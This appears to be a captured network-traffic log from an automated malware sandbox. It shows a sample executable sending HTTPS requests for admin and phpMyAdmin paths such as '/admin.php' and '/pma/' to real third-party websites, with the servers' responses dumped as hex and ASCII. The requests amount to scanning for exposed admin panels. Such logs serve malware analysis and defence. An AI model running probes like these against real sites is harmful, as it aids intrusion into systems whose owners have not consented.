                                                                                                                                                                                                    2023-11-26 05:59:59 UTC6238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javascri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    538192.168.2.456222194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC174OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC569INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:59 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; r
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC6311INData Raw: 31 38 39 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 41 58 20 49 56 3c 2f 74 69 74
                                                                                                                                                                                                    Data Ascii: 189F<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; MAX IV</tit
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16314INData Raw: 33 46 42 32 0d 0a 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76
                                                                                                                                                                                                    Data Ascii: 3FB2ivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: v
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16328INData Raw: 33 46 43 30 0d 0a 31 20 37 37 2e 32 2d 31 36 30 2e 31 68 2e 32 7a 6d 2d 33 31 33 20 34 30 32 2e 35 63 2d 31 34 2d 35 33 2d 31 34 2d 31 30 38 2e 37 20 30 2d 31 36 31 2e 37 68 31 33 36 2e 36 63 2d 33 2e 35 20 32 36 2e 38 2d 35 2e 34 20 35 33 2e 38 2d 35 2e 37 20 38 30 2e 38 2e 33 20 32 37 20 32 2e 31 20 35 34 20 35 2e 37 20 38 30 2e 38 6c 2d 31 33 36 2e 36 2e 31 7a 6d 33 33 2e 32 20 38 30 2e 38 68 31 31 39 2e 32 63 31 32 2e 36 20 35 30 2e 31 20 33 31 2e 34 20 39 38 2e 34 20 35 35 2e 38 20 31 34 33 2e 39 2d 37 33 2e 39 2d 32 35 2e 32 2d 31 33 36 2d 37 36 2e 33 2d 31 37 35 2d 31 34 33 2e 39 7a 6d 31 31 39 2e 32 2d 33 32 33 2e 33 48 32 32 30 2e 32 63 33 39 2d 36 37 2e 35 20 31 30 31 2e 32 2d 31 31 38 2e 37 20 31 37 35 2d 31 34 33 2e 39 2d 32 34 2e 33 20 34 35
                                                                                                                                                                                                    Data Ascii: 3FC01 77.2-160.1h.2zm-313 402.5c-14-53-14-108.7 0-161.7h136.6c-3.5 26.8-5.4 53.8-5.7 80.8.3 27 2.1 54 5.7 80.8l-136.6.1zm33.2 80.8h119.2c12.6 50.1 31.4 98.4 55.8 143.9-73.9-25.2-136-76.3-175-143.9zm119.2-323.3H220.2c39-67.5 101.2-118.7 175-143.9-24.3 45
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16320INData Raw: 33 46 42 38 0d 0a 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 32 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 75 73 65 72 2d 61 63 63 65 73 73 2f 63 61 6c 6c 2d 66 6f 72 2d 70 72 6f 70 6f 73 61 6c 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 20 66 6f 72 20 70 72 6f 70 6f 73 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 32 27 3e 3c 61 20 68 72 65
                                                                                                                                                                                                    Data Ascii: 3FB8t-page item-depth-2'><a href="https://www.maxiv.lu.se/user-access/call-for-proposals/" class="menu-item-label">Call for proposals</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-2'><a hre
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16328INData Raw: 33 46 43 30 0d 0a 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: 3FC0aterial-icon submenu-toggler d-none minus-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-5'><a href="https://w
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16320INData Raw: 33 46 42 38 0d 0a 65 61 6d 6c 69 6e 65 73 2f 66 65 6d 74 6f 6d 61 78 2f 75 73 65 72 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 55 73 65 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 70 6c 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20
                                                                                                                                                                                                    Data Ascii: 3FB8eamlines/femtomax/user-information/" class="menu-item-label">User information</a><span class="material-icon submenu-toggler plus-icon" aria-hidden="true"><span class="material-icons-sharp">add</span></span><span class="material-icon submenu-toggler
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16320INData Raw: 33 46 42 38 0d 0a 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6e 6f 2d 62 6f 72 64 65 72 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 68 69 70 70 69 65 2f 65 78 70 65 72 69 6d 65 6e 74 61 6c 2d 73 74 61 74 69 6f 6e 2f 73 6f 6c 69 64 2d 6c 69 71 75 69 64 2d 62 72 61 6e 63 68 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 53 6f 6c 69 64 2d 4c 69 71 75 69 64 20 42 72 61 6e 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 2f 6c 69 3e 3c 2f
                                                                                                                                                                                                    Data Ascii: 3FB8enu-item-type-post_type menu-item-object-page no-border item-depth-5'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/hippie/experimental-station/solid-liquid-branch/" class="menu-item-label">Solid-Liquid Branch</a></li><li></li></
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16328INData Raw: 33 46 43 30 0d 0a 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 76 65 72 69 74 61 73 2f 62 65 61 6d 6c 69 6e 65 2d 6f 70 74 69 63 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 42 65 61 6d 6c 69 6e 65 20 6f 70 74 69 63 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d
                                                                                                                                                                                                    Data Ascii: 3FC0tem-object-page item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/veritas/beamline-optics/" class="menu-item-label">Beamline optics</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16320INData Raw: 33 46 42 38 0d 0a 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 74 65 63 68 6e 6f 6c 6f 67 79 2f 64 65 74 65 63 74 6f 72 73 2f 64 65 74 65 63 74 6f 72 2d 6c 61 62 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 44 65 74 65 63 74 6f 72 20 6c 61 62 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65
                                                                                                                                                                                                    Data Ascii: 3FB8type menu-item-object-page item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/technology/detectors/detector-lab/" class="menu-item-label">Detector lab</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page ite


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    539192.168.2.45623395.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC294OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=8ce644f91f3f0aa94249a98a8e2141b0|11f187638643e13d7bd1963991fac52b; OF=vanqkb0qfk79hbm3tig91nsue6
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC419INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlydate: Sun, 26 Nov 2023 05:59:59 GMTcontent-type: text/html; charset=utf-8content-length: 0expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    540192.168.2.456237194.47.252.115443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC169OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC534INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:59 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; r
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC13086INData Raw: 33 33 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 41 58 20 49 56 3c 2f 74 69 74
                                                                                                                                                                                                    Data Ascii: 3316<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; MAX IV</tit
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC16307INData Raw: 33 46 41 42 0d 0a 73 68 65 65 74 27 20 69 64 3d 27 6a 71 75 65 72 79 2d 75 69 2d 73 74 79 6c 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 75 69 2f 31 2e 31 33 2e 31 2f 74 68 65 6d 65 73 2f 62 61 73 65 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 61 62 6c 65 70 72 65 73 73 2d 64 65 66 61 75 6c 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 74 61 62 6c 65 70 72 65 73 73 2f 63 73 73 2f 62 75 69 6c 64 2f 64 65 66 61 75 6c 74 2e 63
                                                                                                                                                                                                    Data Ascii: 3FABsheet' id='jquery-ui-styles-css' href='//code.jquery.com/ui/1.13.1/themes/base/jquery-ui.css?ver=6.4.1' media='all' /><link rel='stylesheet' id='tablepress-default-css' href='https://www.maxiv.lu.se/wp-content/plugins/tablepress/css/build/default.c
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16312INData Raw: 33 46 42 30 0d 0a 33 35 20 31 35 2e 37 36 2d 35 2e 35 35 20 34 32 2e 38 34 2d 33 34 2e 35 31 20 37 32 2e 34 35 2d 31 2e 34 32 20 31 2e 34 35 2d 32 2e 38 37 20 32 2e 38 39 2d 34 2e 33 35 20 34 2e 33 34 2d 31 39 2e 36 2d 31 36 2e 34 32 2d 34 32 2e 34 31 2d 33 32 2e 33 36 2d 36 37 2e 34 38 2d 34 37 2e 31 39 7a 22 2f 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 31 22 20 63 79 3d 22 34 35 30 22 20 72 3d 22 32 35 22 2f 3e 3c 2f 67 3e 3c 2f 73 79 6d 62 6f 6c 3e 3c 73 79 6d 62 6f 6c 20 69 64 3d 22 74 77 69 74 74 65 72 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 33 2e 39 35 34 20 34 2e 35 36 39 61 31 30 20 31 30 20 30 20 30 20 31 2d 32 2e 38 32 35 2e 37 37 35 20 34 2e 39 35 38 20 34 2e 39 35 38 20 30 20 30 20
                                                                                                                                                                                                    Data Ascii: 3FB035 15.76-5.55 42.84-34.51 72.45-1.42 1.45-2.87 2.89-4.35 4.34-19.6-16.42-42.41-32.36-67.48-47.19z"/><circle cx="501" cy="450" r="25"/></g></symbol><symbol id="twitter" viewBox="0 0 24 24"><path d="M23.954 4.569a10 10 0 0 1-2.825.775 4.958 4.958 0 0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC30INData Raw: 34 32 0d 0a 65 6d 2d 6c 61 62 65 6c 22 3e 53 61 66 65 74 79 20 72 65 71 75 69 72 65 6d 65
                                                                                                                                                                                                    Data Ascii: 42em-label">Safety requireme
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC42INData Raw: 6e 74 73 20 66 6f 72 20 75 73 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 0d 0a
                                                                                                                                                                                                    Data Ascii: nts for users</a></li><li class='menu-it
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC16270INData Raw: 33 46 38 36 0d 0a 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 33 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 75 73 65 72 2d 61 63 63 65 73 73 2f 73 61 66 65 74 79 2f 69 6e 2d 63 61 73 65 2d 6f 66 2d 65 6d 65 72 67 65 6e 63 79 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 49 6e 20 63 61 73 65 20 6f 66 20 65 6d 65 72 67 65 6e 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f
                                                                                                                                                                                                    Data Ascii: 3F86em menu-item-type-post_type menu-item-object-page item-depth-3'><a href="https://www.maxiv.lu.se/user-access/safety/in-case-of-emergency/" class="menu-item-label">In case of emergency</a></li><li class='menu-item menu-item-type-post_type menu-item-o
